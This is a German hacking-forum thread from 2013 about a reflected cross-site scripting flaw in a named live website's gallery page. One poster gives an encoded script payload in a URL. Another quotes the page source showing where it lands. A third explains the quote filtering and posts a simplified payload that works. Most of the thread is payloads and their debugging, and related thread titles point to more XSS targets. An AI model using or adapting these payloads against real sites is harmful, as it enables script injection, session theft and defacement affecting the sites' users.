Anmelden
Benutzerkonto erstellen
http://www.cantwo.de/einzelbilder.php?kategorie=%27%22%28%29%26%251%3CScRiPt%20%3Eprompt%28byxoil%29%3C%2fScRiPt%3E
lg
Als Gast hast du nur eingeschränkten Zugriff!
Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.
- Antworte auf Themen oder erstelle deine eigenen.
- Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
- Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
- Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
xss cantwo.com
Erstellt von
XoiL
Nach oben
Melden
#2
Geschrieben 23 October 2013 - 16:52 Uhr
juPP
-
- Premium Member
-
- 174 Beiträge
- 61 Bedankt
Hacker
Likes
49
-
000000
-
Blackberry -
Windows, Linux
Nanana. lass doch die armen writer in ruhe 
Ich kann die XSS zwar nachvollziehen, aber ausgeführt wird es nicht. Liegt vielleicht daran dein injezierter code im JS bereich ist und somit ein <script> unnötig / berflüssig macht.
Ich kann die XSS zwar nachvollziehen, aber ausgeführt wird es nicht. Liegt vielleicht daran dein injezierter code im JS bereich ist und somit ein <script> unnötig / berflüssig macht.
<script>
$(document).ready(function(){
//Examples of how to assign the ColorBox event to elements
$(".group'"()&%1<ScRiPt >prompt(byxoil)</ScRiPt>").colorbox({rel:'group'"()&%1<ScRiPt >prompt(byxoil)</ScRiPt>', transition:"none", width:"90%"});
$(".group2").colorbox({rel:'group2', transition:"fade"});
$(".group3").colorbox({rel:'group3', transition:"none", width:"75%", height:"75%"});
$(".group4").colorbox({rel:'group4', slideshow:true});
$(".callbacks").colorbox({
onOpen:function(){ alert('onOpen: colorbox is about to open'); },
onload:function(){ alert('onload: colorbox has started to load the targeted content'); },
onComplete:function(){ alert('onComplete: colorbox has displayed the loaded content'); },
onCleanup:function(){ alert('onCleanup: colorbox has begun the close process'); },
onClosed:function(){ alert('onClosed: colorbox has completely closed'); }
});
//Example of preserving a Javascript event for inline calls.
$("#click").click(function(){
$('#click').css({"background-color":"#f00", "color":"#fff", "cursor":"inherit"}).text("Open this window again and this message will still be here.");
return false;
});
});
</script>
... hier könnte Ihre Werbung stehen
#4
Geschrieben 23 October 2013 - 17:24 Uhr
Laggy
-
- Premium Member
-
- 11 Beiträge
- 0 Bedankt
Noob
Likes
8
-
Vuln Reporter
Liegt daran, dass Text in der Klammer steht (zahlen würden gehn) und sowohl ' wie auch " gefilert und durch /' bzw /" ersetzt werdenIch kann die XSS zwar nachvollziehen, aber ausgeführt wird es nicht. Liegt vielleicht daran dein injezierter code im JS bereich ist und somit ein <script> unnötig / berflüssig macht.
So funzts dann
http://www.cantwo.de/einzelbilder.php?kategorie=<script>prompt(/byxoil/)</script>
Bearbeitet von Laggy, 23 October 2013 - 17:28 Uhr.
| Thema | Forum | Themenstarter | Statistik | Letzter Beitrag | |
|---|---|---|---|---|---|
[xss] lablue.de |
 Classic Hacking
|
|
|
|
|
CVE-2013-6837 - DOM Based XSS DOM XSS, XSS, pentest
|
Classic Hacking
|
vestas88 |
|
|
|
[XSS] de.filesovermiles.com |
Classic Hacking
|
SecurityFlaw |
|
|
Besucher die dieses Thema lesen:
Mitglieder: , Gäste: , unsichtbare Mitglieder:
This topic has been visited by 3 user(s)
Hacking & Security
Made with in germany.
